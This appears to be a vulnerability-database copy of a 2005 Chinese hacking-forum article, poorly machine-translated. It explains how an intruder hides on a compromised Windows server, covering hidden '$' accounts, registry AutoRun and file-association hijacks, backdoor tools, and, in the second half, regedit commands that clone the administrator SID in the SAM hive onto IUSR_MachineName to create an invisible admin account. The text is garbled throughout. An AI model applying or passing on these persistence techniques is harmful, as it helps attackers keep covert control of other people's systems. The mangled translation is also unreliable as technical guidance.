Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:6220053779
HistoryOct 18, 2005 - 12:00 a.m.

Enter a server after hide their own means-vulnerability warning-the black bar safety net

2005-10-1800:00:00
佚名
www.myhack58.com
17
JSON

I like hiding, it summed up some of the hidden programme, specifically to look at the situation.
Then the General into a server after hide their own means:
To 1. superdoor clone, but there is a bug. Banyan brother. ca clone, to rely on the ipc, it is not very cool
2。 Create count$such hidden account, netuser see, but in the management of the user can see, and in I got to computer properties on the user profile to display an unknown account, and in document and setting, will count$folder, is not particularly good, I in 3 station around the machine as the results are the kill.
3. the Write a guest. vbs starts when you create an account or activate the guest user or tsinternetuser user, in the registry in the winlogon in the import key value well in advance),make him open
Machine from running guest. vbs, thus creating a Ghost account.
Or import the[HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor]
“AutoRun”=“C:\\Program Files\\guest. vbs”
This is associated to cmd, just run it create.
4。 Like a glacier that is associated to txt, exe, run txt run our program
5。 In the group policy configuration from the running.
6 in. Set the file Association, important run Notepad or what is the activation vbs
7 in. Planting hackdefender, hack’sdoor, the winshell, Wuhan boys like the back door, but easy to be killed, if no transformation is almost no effect, if not to be killed, that’s it. Hey Hey all!!!
8 in. Inclusion file, often used to replace the file into a rar self-extracting file contains both the original exe file and run your program(that is, the winrar do not be killing the bundle is run after it is repeated for 3, 4, Step 5, who will you.
9 in. Searching between, find hideadmin this thing really wrong, and requires administrator permissions, hidden with a$at the end of the user, the awesome you! Command-line management interface, the user configuration file can not find his figure, in a word, strong! Strong to me for ages don’t know how to remove it, just let him stay! Down to the next leader also has a tool with the same purpose.
1 to 0. Replacement service, telnet or termsvc replaced by another service or build a new to
1 to 1. Handmade in the registry cloning the hidden account, online spread of a seemingly very cool method, but after I 2 0 0 0 server test maybe is not in the domain of the reason for non-existent domains or account of this key value, so it is impossible to find.
But still elaborate a bit:
Windows 2 0 0 0 and Windows NT, the default administrator account SID is fixed 5 0 0 to 0x1f4, then we can use the machine in the presence of an account the SID is 5 0 0 the account to clone, here we select the account is IUSR_MachineName (in order to enhance the concealment properties).
cmd under
regedit /e admin. reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
The SID is 5 0 0 the administrator account information related to the export, and then edit the admin. reg file, the admin. reg file the third line
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]
The last of the’1F4’to modify for the IUSR_MachineName SID(most of the machine the user’s SID is 0x3E9, if the machine in the initial installation does not install IIS, and create yourself an account after re-installing IIS is likely not the value), and the Root. in the reg file’1F4’modified to’3E9’after the execution and then the other one is you need to modify the account value
regedit /e iusr. reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003E9
The iusr. reg file in the“’V’=hex:0”to iusr. reg file to the end of the section to copy down
Then replace adam. reg in the same position of the part.
Finally use regedit /s adam. reg to import the Reg file
Then run the net user IUSR_MachineName password to modify the IUSR_MachineName password
hehe,ok, you’re done!
Now IUSR_MachineName account has administrator permissions, but you use the net. exe and management tools in the user management will not see any traces, even if you go to see belongs to the group and user, and modify the front without any difference.
Probably know so much, guys. if there is a better way feel free to enlighten me。。。。。。。

JSON